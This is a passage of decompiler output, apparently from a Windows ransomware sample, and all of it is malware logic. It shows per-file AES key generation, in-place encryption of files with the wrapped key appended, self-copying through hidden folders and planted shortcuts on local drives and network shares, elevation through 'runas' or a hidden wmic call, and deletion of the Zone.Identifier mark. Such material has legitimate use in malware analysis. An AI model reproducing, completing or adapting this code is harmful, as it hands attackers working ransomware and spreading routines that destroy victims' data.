        && ReadFile(FileW, &v10, 4u, &NumberOfBytesRead, nullptr)
        && NumberOfBytesRead == 4 )
      {
        v3 = dword_405EC0(0, Buffer, 128);
        if ( v3 == v10 )
        {
          v9 = 2;
        }
        else
        {
          if ( FileSizeHigh != 0 )
          {
            dwMaximumSizeLow = 5242880;
          }
          else if ( lpFileNamea < 0x500000 )
          {
            dwMaximumSizeLow = lpFileNamea & 0x7FFFE0;
          }
          else
          {
            dwMaximumSizeLow = 5242880;
          }
          FileMappingW = CreateFileMappingW(FileW, nullptr, 4u, 0, dwMaximumSizeLow, nullptr);
          hObject = FileMappingW;
          if ( FileMappingW != nullptr )
          {
            lpFileNameb = (BYTE *)MapViewOfFile(FileMappingW, 6u, 0, 0, dwMaximumSizeLow);
            if ( lpFileNameb != nullptr )
            {
              if ( CryptGenKey(hProv, 0x6610u, 1u, &phKey) )
              {
                NumberOfBytesRead = 128;
                if ( CryptExportKey(phKey, 0, 8u, 0, Buffer, &NumberOfBytesRead)
                  && CryptEncrypt(hKey, 0, true, 0, Buffer, &NumberOfBytesRead, 0x80u)
                  && CryptEncrypt(phKey, 0, false, 0, lpFileNameb, &dwMaximumSizeLow, dwMaximumSizeLow) )
                {
                  v10 = dword_405EC0(0, Buffer, 128);
                  SetFilePointer(FileW, 0, nullptr, 2u);
                  WriteFile(FileW, Buffer, 0x80u, &NumberOfBytesRead, nullptr);
                  WriteFile(FileW, &v10, 4u, &NumberOfBytesRead, nullptr);
                  v9 = 1;
                }
                CryptDestroyKey(phKey);
              }
              UnmapViewOfFile(lpFileNameb);
            }
            CloseHandle(hObject);
          }
        }
      }
      CloseHandle(FileW);
    }
  }
  return v9;
}
// 404EEC: mask 0xFFFFFFE0 is shortened because %lpFileName.4 <= 0x4FFFFF
// 405EC0: using guessed type int (__stdcall *dword_405EC0)(_DWORD, _DWORD, _DWORD);

//----- (0040500E) --------------------------------------------------------
void __stdcall sub_40500E(LPCWSTR lpFileName)
{
  int i; // esi

  for ( i = 5; i != 0; --i )
  {
    if ( sub_404DE2(lpFileName) != 0 )
      break;
    Sleep(0x10u);
  }
}

//----- (0040502E) --------------------------------------------------------
BOOL __stdcall sub_40502E(BYTE *pbData, DWORD pdwDataLen)
{
  BOOL v2; // esi
  HCRYPTKEY phKey; // [esp+4h] [ebp-4h] BYREF

  v2 = false;
  if ( CryptImportKey(hProv, &::pbData, 0x2Cu, 0, 0, &phKey) )
  {
    v2 = CryptDecrypt(phKey, 0, false, 0, pbData, &pdwDataLen);
    CryptDestroyKey(phKey);
  }
  return v2;
}

//----- (0040507A) --------------------------------------------------------
BOOL sub_40507A()
{
  int v0; // esi

  v0 = 0;
  if ( sub_40502E(pszString, 0x120u) && sub_40502E((BYTE *)&String, 0x1D80u) && sub_40502E((BYTE *)&byte_4011D4, 0x20u) )
    return sub_40502E(&dword_403098, 0x20u);
  return v0;
}

//----- (004050C8) --------------------------------------------------------
int __stdcall sub_4050C8(WCHAR *lpFileName, PCWSTR pszStart, int a3)
{
  PWSTR v3; // edi
  PWSTR v4; // eax
  PCWSTR v5; // eax
  BSTR v6; // eax
  OLECHAR *v7; // esi
  int v9; // [esp+8h] [ebp-18h]
  WCHAR *psz; // [esp+Ch] [ebp-14h]
  OLECHAR *v11; // [esp+10h] [ebp-10h]
  OLECHAR *bstrString; // [esp+14h] [ebp-Ch]
  int v13; // [esp+18h] [ebp-8h] BYREF
  LPVOID ppv; // [esp+1Ch] [ebp-4h] BYREF
  OLECHAR *pszStarta; // [esp+2Ch] [ebp+Ch]

  v3 = lpFileName;
  v9 = 0;
  ppv = nullptr;
  v13 = 0;
  SetFileAttributesW(lpFileName, 2u);
  if ( (GetFileAttributesW(lpFileName) & 2) != 0 && CoCreateInstance(&rclsid, nullptr, 1u, &riid, &ppv) == 0 )
  {
    psz = (WCHAR *)LocalAlloc(0x40u, 0x800u);
    if ( psz != nullptr )
    {
      v11 = SysAllocString(::psz);
      if ( v11 != nullptr )
      {
        bstrString = SysAllocString(aCmdExe);
        if ( bstrString != nullptr )
        {
          if ( a3 == 0 )
            v3 = StrRChrW(lpFileName, nullptr, 0x5Cu) + 1;
          v4 = StrRChrW(pszStart, nullptr, 0x5Cu);
          if ( v4 != nullptr )
            v5 = v4 + 1;
          else
            v5 = pszStart;
          wsprintfW(psz, aCExplorerExeST, v3, pszStart, v5, v3, v5);
          v6 = SysAllocString(psz);
          pszStarta = v6;
          if ( v6 != nullptr )
          {
            if ( (*(int (__stdcall **)(LPVOID, BSTR))(*(_DWORD *)ppv + 44))(ppv, v6) == 0
              && (*(int (__stdcall **)(LPVOID, OLECHAR *, int))(*(_DWORD *)ppv + 68))(ppv, v11, 3) == 0
              && (*(int (__stdcall **)(LPVOID, OLECHAR *))(*(_DWORD *)ppv + 80))(ppv, bstrString) == 0
              && (*(int (__stdcall **)(LPVOID, int))(*(_DWORD *)ppv + 60))(ppv, 7) == 0
              && (**(int (__stdcall ***)(LPVOID, int *, int *))ppv)(ppv, dword_403790, &v13) == 0 )
            {
              lstrcpyW(psz, lpFileName);
              lstrcatW(psz, aLnk);
              v7 = SysAllocString(psz);
              if ( v7 != nullptr )
              {
                if ( (*(int (__stdcall **)(int, OLECHAR *, _DWORD))(*(_DWORD *)v13 + 24))(v13, v7, 0) == 0 )
                  v9 = 1;
                SysFreeString(v7);
              }
              (*(void (__stdcall **)(int))(*(_DWORD *)v13 + 8))(v13);
            }
            SysFreeString(pszStarta);
          }
          SysFreeString(bstrString);
        }
        SysFreeString(v11);
      }
      LocalFree(psz);
    }
    (*(void (__stdcall **)(LPVOID))(*(_DWORD *)ppv + 8))(ppv);
  }
  return v9;
}
// 403790: using guessed type int dword_403790[2];

//----- (0040527B) --------------------------------------------------------
int __stdcall sub_40527B(int a1)
{
  int result; // eax
  unsigned int i; // esi

  result = 0;
  for ( i = 0; i < 4; ++i )
  {
    result = dword_405EC0(result, &VolumeSerialNumber, 4);
    *(_DWORD *)(a1 + 4 * i) = result;
  }
  return result;
}
// 405EC0: using guessed type int (__stdcall *dword_405EC0)(_DWORD, _DWORD, _DWORD);

//----- (0040529F) --------------------------------------------------------
WCHAR *__stdcall sub_40529F(WCHAR *lpString, LPCWSTR lpExistingFileName, int a3)
{
  int v3; // eax
  WCHAR *result; // eax
  WCHAR *v5; // ebx
  HANDLE FileW; // eax
  struct _WIN32_FIND_DATAW *v7; // esi
  const WCHAR *cFileName; // edi
  WCHAR *v9; // eax
  WCHAR *v10; // esi
  WCHAR *v11; // edi
  int v12; // eax
  int v13; // [esp-2Ch] [ebp-58h]
  int v14; // [esp-28h] [ebp-54h]
  int v15; // [esp-24h] [ebp-50h]
  int v16; // [esp-20h] [ebp-4Ch]
  int v17; // [esp-1Ch] [ebp-48h]
  int v18; // [esp-18h] [ebp-44h]
  int v19; // [esp-14h] [ebp-40h]
  int v20; // [esp-10h] [ebp-3Ch]
  int v21; // [esp-Ch] [ebp-38h]
  int v22; // [esp-8h] [ebp-34h]
  int v23; // [esp-4h] [ebp-30h]
  struct _WIN32_FIND_DATAW *v24; // [esp+10h] [ebp-1Ch]
  HANDLE hFindFile; // [esp+14h] [ebp-18h]
  WCHAR *v26; // [esp+18h] [ebp-14h]
  int v27; // [esp+1Ch] [ebp-10h] BYREF
  unsigned __int16 v28; // [esp+20h] [ebp-Ch]
  unsigned __int16 v29; // [esp+22h] [ebp-Ah]
  unsigned __int8 v30; // [esp+24h] [ebp-8h]
  unsigned __int8 v31; // [esp+25h] [ebp-7h]
  unsigned __int8 v32; // [esp+26h] [ebp-6h]
  unsigned __int8 v33; // [esp+27h] [ebp-5h]
  unsigned __int8 v34; // [esp+28h] [ebp-4h]
  unsigned __int8 v35; // [esp+29h] [ebp-3h]
  unsigned __int8 v36; // [esp+2Ah] [ebp-2h]
  unsigned __int8 v37; // [esp+2Bh] [ebp-1h]

  v3 = lstrlenW(lpString);
  result = (WCHAR *)LocalAlloc(0x40u, 2 * v3 + 24);
  v5 = result;
  v26 = result;
  if ( result != nullptr )
  {
    wsprintfW(result, aSU, lpString, VolumeSerialNumber & 0xFFFFFFF);
    FileW = CreateFileW(v5, 0x40000000u, 0, nullptr, 2u, 0x4000080u, nullptr);
    if ( FileW != (HANDLE)-1 )
    {
      CloseHandle(FileW);
      v7 = (struct _WIN32_FIND_DATAW *)LocalAlloc(0x40u, 0x250u);
      v24 = v7;
      if ( v7 != nullptr )
      {
        lstrcatW(lpString, String2);
        hFindFile = FindFirstFileW(lpString, v7);
        if ( hFindFile != (HANDLE)-1 )
        {
          StrRChrW(lpString, nullptr, 0x5Cu)[1] = 0;
          do
          {
            if ( (v7->dwFileAttributes & 0x10) != 0 && (v7->dwFileAttributes & 2) == 0 )
            {
              cFileName = v7->cFileName;
              if ( lstrcmpW(v7->cFileName, asc_4032B4) != 0 && lstrcmpW(v7->cFileName, asc_4032AC) != 0 )
              {
                v9 = (WCHAR *)LocalAlloc(0x40u, 0x800u);
                v10 = v9;
                if ( v9 != nullptr )
                {
                  lstrcpyW(v9, lpString);
                  lstrcatW(v10, cFileName);
                  v11 = (WCHAR *)LocalAlloc(0x40u, 0x800u);
                  if ( v11 != nullptr )
                  {
                    sub_40527B((int)&v27);
                    if ( a3 != 0 )
                      lstrcpyW(v11, lpString);
                    v23 = v37;
                    v22 = v36;
                    v21 = v35;
                    v20 = v34;
                    v19 = v33;
                    v18 = v32;
                    v17 = v31;
                    v16 = v30;
                    v15 = v29;
                    v14 = v28;
                    v13 = v27;
                    v12 = lstrlenW(v11);
                    wsprintfW(&v11[v12], a08x04x04x02x02, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23);
                    if ( sub_4050C8(v10, v11, a3) != 0 )
                    {
                      Sleep(0x10u);
                      if ( a3 != 0 )
                      {
                        lstrcpyW(v10, v11);
                      }
                      else
                      {
                        lstrcpyW(v10, lpString);
                        lstrcatW(v10, v11);
                      }
                      if ( GetFileAttributesW(v10) == -1 )
                      {
                        CopyFileW(lpExistingFileName, v10, false);
                        SetFileAttributesW(v10, 3u);
                      }
                    }
                    LocalFree(v11);
                  }
                  LocalFree(v10);
                }
                v7 = v24;
              }
            }
          }
          while ( FindNextFileW(hFindFile, v7) );
          FindClose(hFindFile);
          v5 = v26;
        }
        LocalFree(v7);
      }
    }
    return (WCHAR *)LocalFree(v5);
  }
  return result;
}

//----- (004054E2) --------------------------------------------------------
WCHAR *__stdcall sub_4054E2(WCHAR *lpString, int a2, LPCWSTR lpExistingFileName, int a4)
{
  WCHAR *result; // eax

  if ( a2 == 3 || a2 == 2 )
    return sub_40529F(lpString, lpExistingFileName, 0);
  return result;
}

//----- (00405502) --------------------------------------------------------
WCHAR *__stdcall sub_405502(LPCWSTR lpExistingFileName)
{
  WCHAR *result; // eax
  WCHAR *v2; // esi

  sub_4038B1((int (__stdcall *)(wchar_t *, UINT, int, int))sub_4054E2, (int)lpExistingFileName, 0);
  result = (WCHAR *)LocalAlloc(0x40u, 0x800u);
  v2 = result;
  if ( result != nullptr )
  {
    if ( SHGetSpecialFolderPathW(nullptr, result, 0, false) )
      sub_40529F(v2, lpExistingFileName, 0);
    return (WCHAR *)LocalFree(v2);
  }
  return result;
}

//----- (0040554D) --------------------------------------------------------
int __stdcall sub_40554D(LPCWSTR lpExistingFileName, LPNETRESOURCEW lpNetResource)
{
  int result; // eax
  LPCWSTR *v3; // eax
  LPCWSTR *v4; // edi
  LPCWSTR *v5; // esi
  int v6; // eax
  WCHAR *v7; // eax
  WCHAR *v8; // edi
  LPCWSTR *v9; // [esp+0h] [ebp-Ch]
  DWORD BufferSize; // [esp+4h] [ebp-8h] BYREF
  HANDLE hEnum; // [esp+8h] [ebp-4h] BYREF

  result = WNetOpenEnumW(2u, 0, 0, lpNetResource, &hEnum);
  if ( result == 0 )
  {
    v3 = (LPCWSTR *)LocalAlloc(0x40u, 0x4000u);
    v4 = v3;
    v9 = v3;
    if ( v3 != nullptr )
    {
      lpNetResource = (LPNETRESOURCEW)-1;
      BufferSize = 0x4000;
      if ( WNetEnumResourceW(hEnum, (LPDWORD)&lpNetResource, v3, &BufferSize) == 0 && lpNetResource != nullptr )
      {
        v5 = v4 + 5;
        do
        {
          if ( (*(_BYTE *)(v5 - 2) & 2) != 0 )
          {
            sub_40554D(lpExistingFileName, (LPNETRESOURCEW)(v5 - 5));
          }
          else if ( *(v5 - 4) == (LPCWSTR)1 )
          {
            v6 = lstrlenW(*v5);
            v7 = (WCHAR *)LocalAlloc(0x40u, 2 * v6 + 16);
            v8 = v7;
            if ( v7 != nullptr )
            {
              lstrcpyW(v7, *v5);
              sub_40529F(v8, lpExistingFileName, 1);
              LocalFree(v8);
            }
          }
          v5 += 8;
          lpNetResource = (LPNETRESOURCEW)((char *)lpNetResource - 1);
        }
        while ( lpNetResource != nullptr );
        v4 = v9;
      }
      LocalFree(v4);
    }
    return WNetCloseEnum(hEnum);
  }
  return result;
}

//----- (0040561E) --------------------------------------------------------
void sub_40561E()
{
  WCHAR *v0; // eax
  WCHAR *v1; // esi

  CoInitialize(nullptr);
  v0 = (WCHAR *)LocalAlloc(0x40u, 0x800u);
  v1 = v0;
  if ( v0 != nullptr )
  {
    GetModuleFileNameW(nullptr, v0, 0x400u);
    lstrcatW(v1, aZoneIdentifier);
    DeleteFileW(v1);
    GetModuleFileNameW(nullptr, v1, 0x400u);
    sub_405502(v1);
    SHChangeNotify(0x8000000, 0, nullptr, nullptr);
    sub_40554D(v1, nullptr);
    LocalFree(v1);
  }
  CoUninitialize();
}

//----- (00405692) --------------------------------------------------------
int __stdcall sub_405692(LPCWSTR lptstrFilename)
{
  int v1; // esi
  SIZE_T FileVersionInfoSizeW; // ebx
  HLOCAL v3; // eax
  void *v4; // edi
  LPVOID lpBuffer; // [esp+Ch] [ebp-4h] BYREF

  v1 = 0;
  FileVersionInfoSizeW = GetFileVersionInfoSizeW(lptstrFilename, nullptr);
  v3 = LocalAlloc(0x40u, FileVersionInfoSizeW);
  v4 = v3;
  if ( v3 != nullptr )
  {
    if ( GetFileVersionInfoW(lptstrFilename, 0, FileVersionInfoSizeW, v3)
      && VerQueryValueW(v4, SubBlock, &lpBuffer, nullptr) )
    {
      v1 = (*((_DWORD *)lpBuffer + 4) >> 8) | (unsigned __int8)*((_DWORD *)lpBuffer + 4);
    }
    LocalFree(v4);
  }
  return v1;
}

//----- (004056F6) --------------------------------------------------------
int sub_4056F6()
{
  int v0; // ebx
  HANDLE CurrentProcess; // eax
  PSID *v2; // esi
  PUCHAR SidSubAuthorityCount; // eax
  PDWORD SidSubAuthority; // eax
  HANDLE TokenHandle; // [esp+4h] [ebp-8h] BYREF
  DWORD ReturnLength; // [esp+8h] [ebp-4h] BYREF

  v0 = 12288;
  CurrentProcess = GetCurrentProcess();
  if ( OpenProcessToken(CurrentProcess, 8u, &TokenHandle) )
  {
    v2 = (PSID *)LocalAlloc(0x40u, 0x200u);
    if ( v2 != nullptr )
    {
      ReturnLength = 0;
      if ( GetTokenInformation(TokenHandle, TokenIntegrityLevel, v2, 0x200u, &ReturnLength) && ReturnLength != 0 )
      {
        SidSubAuthorityCount = GetSidSubAuthorityCount(*v2);
        if ( SidSubAuthorityCount != nullptr )
        {
          SidSubAuthority = GetSidSubAuthority(*v2, *SidSubAuthorityCount - 1);
          if ( SidSubAuthority != nullptr )
            v0 = *SidSubAuthority;
        }
      }
      LocalFree(v2);
    }
    CloseHandle(TokenHandle);
  }
  return v0;
}

//----- (00405783) --------------------------------------------------------
int sub_405783()
{
  HLOCAL v0; // eax
  WCHAR *v1; // eax
  int v2; // esi
  SHELLEXECUTEINFOW pExecInfo; // [esp+8h] [ebp-44h] BYREF
  int v5; // [esp+44h] [ebp-8h]
  HLOCAL hMem; // [esp+48h] [ebp-4h]

  v5 = 0;
  dword_405EBC(&pExecInfo, 0, 60);
  v0 = LocalAlloc(0x40u, 0x800u);
  hMem = v0;
  if ( v0 != nullptr )
  {
    GetModuleFileNameW(nullptr, (LPWSTR)v0, 0x400u);
    v1 = (WCHAR *)LocalAlloc(0x40u, 0x800u);
    v2 = 0;
    pExecInfo.lpParameters = v1;
    if ( v1 != nullptr )
    {
      wsprintfW(v1, aCSU, hMem);
      pExecInfo.cbSize = 60;
      pExecInfo.lpFile = aCmdExe;
      pExecInfo.lpVerb = aRunas;
      pExecInfo.fMask = 8389632;
      pExecInfo.nShow = 0;
      while ( !ShellExecuteExW(&pExecInfo) )
      {
        Sleep(0x400u);
        if ( (unsigned int)++v2 >= 0xA )
          goto LABEL_8;
      }
      v5 = 1;
LABEL_8:
      LocalFree((HLOCAL)pExecInfo.lpParameters);
    }
    LocalFree(hMem);
  }
  return v5;
}
// 403550: using guessed type wchar_t aRunas[6];
// 405EBC: using guessed type int (__cdecl *dword_405EBC)(_DWORD, _DWORD, _DWORD);

//----- (00405846) --------------------------------------------------------
void sub_405846()
{
  unsigned int i; // esi
  SHELLEXECUTEINFOW pExecInfo; // [esp+4h] [ebp-3Ch] BYREF

  dword_405EBC(&pExecInfo, 0, 60);
  pExecInfo.nShow = 0;
  pExecInfo.cbSize = 60;
  pExecInfo.lpFile = aWmicExe;
  pExecInfo.lpParameters = aProcessCallCre;
  pExecInfo.fMask = 1024;
  for ( i = 0; i < 0xA; ++i )
  {
    if ( ShellExecuteExW(&pExecInfo) )
      break;
    Sleep(0x10u);
  }
}
// 403578: using guessed type wchar_t aProcessCallCre[185];
// 4036EC: using guessed type wchar_t aWmicExe[9];
// 405EBC: using guessed type int (__cdecl *dword_405EBC)(_DWORD, _DWORD, _DWORD);

//----- (0040589D) --------------------------------------------------------
void __thiscall sub_40589D(HKEY this)
{
  HKEY phkResult; // [esp+0h] [ebp-4h] BYREF

  phkResult = this;
  if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, SubKey, 0, 2u, &phkResult) == 0 )
  {
    RegDeleteValueW(phkResult, ValueName);
    RegCloseKey(phkResult);
    SHChangeNotify(0x8000000, 0, nullptr, nullptr);
  }
}

//----- (004058E7) --------------------------------------------------------
void __noreturn start()
{
  WCHAR *v0; // esi
  HMODULE ModuleHandleA; // ebx
  const WCHAR *CommandLineW; // eax
  PWSTR v3; // edi
  int v4; // eax
  HKEY v5; // ecx
  unsigned int v6; // edi
  BOOL i; // eax
  HKEY v8; // ecx
  unsigned int v9; // edi
  CHAR *v10; // eax
  CHAR *v11; // ebx
  WCHAR *v12; // eax
  WCHAR *v13; // edi
  int v14; // eax
  unsigned int k; // edi
  BOOL m; // eax
  BYTE *v17; // eax
  BYTE *v18; // edi
  BYTE *v19; // ebx
  int v20; // eax
  unsigned int j; // edi
  DWORD v22; // [esp+4h] [ebp-A0h]
  wchar_t *v23; // [esp+4h] [ebp-A0h]
  HCRYPTKEY phKey; // [esp+18h] [ebp-8Ch] BYREF
  unsigned int v25; // [esp+1Ch] [ebp-88h]
  SHELLEXECUTEINFOW pExecInfo; // [esp+20h] [ebp-84h] BYREF
  _BYTE v27[8]; // [esp+5Ch] [ebp-48h] BYREF
  int v28; // [esp+64h] [ebp-40h]

  SetErrorMode(1u);
  v0 = (WCHAR *)LocalAlloc(0x40u, 0x800u);
  if ( v0 == nullptr )
    goto LABEL_4;
  ModuleHandleA = GetModuleHandleA(ModuleName);
  GetModuleFileNameW(ModuleHandleA, v0, 0x400u);
  v25 = sub_405692(v0);
  v0[3] = 0;
  GetVolumeInformationW(v0, nullptr, 0, &VolumeSerialNumber, nullptr, nullptr, nullptr, 0);
  pOptionalEntropy.pbData = (BYTE *)&VolumeSerialNumber;
  pOptionalEntropy.cbData = 4;
  RtlComputeCrc32 = (int (__stdcall *)(_DWORD, _DWORD, _DWORD))GetProcAddress(ModuleHandleA, ProcName);
  memset = (void *(__cdecl *)(void *, int, size_t))GetProcAddress(ModuleHandleA, aMemset);
  memcpy = (void *(__cdecl *)(void *, const void *, size_t))GetProcAddress(ModuleHandleA, aMemcpy);
  CommandLineW = GetCommandLineW();
  v3 = StrStrW(CommandLineW, aU);
  if ( v3 == nullptr )
  {
    wsprintfW(v0, aMU, VolumeSerialNumber);
    if ( OpenMutexW(1u, false, v0) != nullptr )
      goto LABEL_4;
    CreateMutexW(nullptr, false, v0);
  }
  SHGetSpecialFolderPathW(nullptr, v0, 26, false);
  v22 = VolumeSerialNumber;
  v4 = lstrlenW(v0);
  wsprintfW(&v0[v4], aU_0, v22);
  if ( v3 != nullptr )
  {
    sub_405846();
    sub_40589D(v5);
    hObject = CreateFileW(v0, 0x80000000, 3u, nullptr, 3u, 0x80u, nullptr);
    if ( hObject != (HANDLE)-1 )
    {
      v6 = 1;
      if ( CreateStreamOnHGlobal(nullptr, true, &ppstm) == 0 )
      {
        sub_4038B1((int (__stdcall *)(wchar_t *, UINT, int, int))sub_403A7E, 0, 0);
        sub_403BEF();
        if ( CryptAcquireContextW(&hProv, nullptr, nullptr, 0x18u, 0xF0000000) )
        {
          hKey = sub_404CFD();
          if ( hKey != 0 )
          {
            do
            {
              for ( i = sub_403BCC(v0); i; i = sub_403B5D(v0) )
              {
                if ( (unsigned __int8)sub_4037EA(v0) == v6 )
                  sub_40500E(v0);
              }
              ++v6;
            }
            while ( v6 <= 6 );
            CryptDestroyKey(hKey);
          }
          CryptReleaseContext(hProv, 0);
        }
        ppstm->lpVtbl->Release(ppstm);
      }
      CloseHandle(hObject);
    }
    sub_40561E();
LABEL_4:
    ExitProcess(0);
  }
  hObject = CreateFileW(v0, 0xC0000000, 1u, nullptr, 4u, 0x80u, nullptr);
  if ( hObject == (HANDLE)-1 )
  {
LABEL_89:
    LocalFree(v0);
    goto LABEL_4;
  }
  if ( !CryptAcquireContextW(&hProv, nullptr, nullptr, 0x18u, 0xF0000000) )
  {
LABEL_88:
    CloseHandle(hObject);
    goto LABEL_89;
  }
  if ( !sub_40507A() )
  {
LABEL_87:
    CryptReleaseContext(hProv, 0);
    goto LABEL_88;
  }
  v9 = sub_404BD1();
  if ( v9 > 7 )
  {
    v9 = 0;
    sub_404BC0(0);
  }
  if ( v9 != 0 )
  {
    if ( v9 != 1 )
    {
      if ( v9 != 2 )
      {
        if ( v9 != 3 )
        {
          if ( v9 != 4 )
          {
            if ( v9 != 5 )
            {
              if ( v9 != 6 )
                goto LABEL_87;
              goto LABEL_86;
            }
LABEL_79:
            v19 = sub_404A96(3u);
            if ( v19 != nullptr )
            {
              if ( SHGetSpecialFolderPathW(nullptr, v0, 0, false) )
              {
                v23 = off_4011F4;
                v20 = lstrlenW(v0);
                wsprintfW(&v0[v20], aSS, v19, v23);
                memset(&pExecInfo, 0, sizeof(pExecInfo));
                pExecInfo.cbSize = 60;
                pExecInfo.lpFile = v0;
                pExecInfo.nShow = 1;
                pExecInfo.fMask = 8389632;
                for ( j = 0; j < 0xA; ++j )
                {
                  if ( ShellExecuteExW(&pExecInfo) )
                    break;
                  Sleep(0x10u);
                }
              }
              LocalFree(v19);
            }
            sub_404BC0(6);
LABEL_86:
            sub_40561E();
            goto LABEL_87;
          }
LABEL_74:
          if ( v25 >= 0x600 )
          {
            if ( sub_4056F6() == 12288 )
              sub_405846();
            else
              sub_405783();
          }
          sub_40589D(v8);
          sub_404BC0(5);
          goto LABEL_79;
        }
LABEL_66:
        v17 = sub_404A96(3u);
        v18 = v17;
        if ( v17 != nullptr )
        {
          if ( sub_4044E6(v17) != 0 )
          {
            if ( sub_404D3D() != 0 )
            {
              ppstm = sub_404C3C();
              if ( ppstm != nullptr )
              {
                sub_404753((int)v18, ::phKey);
                ppstm->lpVtbl->Release(ppstm);
              }
              CryptDestroyKey(::phKey);
            }
            sub_40424D((int)v18);
            sub_404BC0(4);
          }
          LocalFree(v18);
        }
        goto LABEL_74;
      }
LABEL_55:
      ppstm = sub_404C3C();
      if ( ppstm != nullptr )
      {
        hKey = sub_404CFD();
        if ( hKey != 0 )
        {
          for ( k = 1; k <= 6; ++k )
          {
            for ( m = sub_403BCC(v0); m; m = sub_403B5D(v0) )
            {
              if ( (unsigned __int8)sub_4037EA(v0) == k )
                sub_40500E(v0);
            }
          }
          sub_404BC0(3);
          CryptDestroyKey(hKey);
        }
        ppstm->lpVtbl->Release(ppstm);
      }
      goto LABEL_66;
    }
  }
  else if ( CreateStreamOnHGlobal(nullptr, true, &ppstm) == 0 )
  {
    sub_4038B1((int (__stdcall *)(wchar_t *, UINT, int, int))sub_403A7E, 0, 0);
    sub_403A98(nullptr);
    if ( ppstm->lpVtbl->Stat(ppstm, (STATSTG *)v27, 1) != 0 || v28 == 0 )
    {
      sub_40561E();
    }
    else if ( sub_404BED() )
    {
      sub_404BC0(1);
    }
    ppstm->lpVtbl->Release(ppstm);
  }
  ppstm = sub_404C3C();
  if ( ppstm != nullptr )
  {
    sub_403BEF();
    if ( sub_404D3D() != 0 )
    {
      if ( CryptGenKey(hProv, 0xA400u, 0x4000001u, &phKey) )
      {
        v10 = sub_403E11(phKey);
        v11 = v10;
        if ( v10 != nullptr )
        {
          v12 = sub_403C45(v10);
          v13 = v12;
          if ( v12 != nullptr )
          {
            sub_404006(v11, (int)v12);
            if ( sub_404C9D(phKey) )
            {
              v14 = lstrlenW(v13);
              if ( sub_404B2E(3u, (BYTE *)v13, 2 * v14 + 2) )
                sub_404BC0(2);
            }
            LocalFree(v13);
          }
          LocalFree(v11);
        }
        CryptDestroyKey(phKey);
      }
      CryptDestroyKey(::phKey);
    }
    ppstm->lpVtbl->Release(ppstm);
  }
  goto LABEL_55;
}
// 405A0D: variable 'v5' is possibly undefined
// 405D92: variable 'v8' is possibly undefined
// 4011F4: using guessed type wchar_t *off_4011F4;
// 4058E7: using guessed type void __noreturn start();
// 405EC0: using guessed type int (__stdcall *RtlComputeCrc32)(_DWORD, _DWORD, _DWORD);

// nfuncs=58 queued=49 decompiled=49 lumina nreq=0 worse=0 better=0
// ALL OK, 49 function(s) have been successfully decompiled
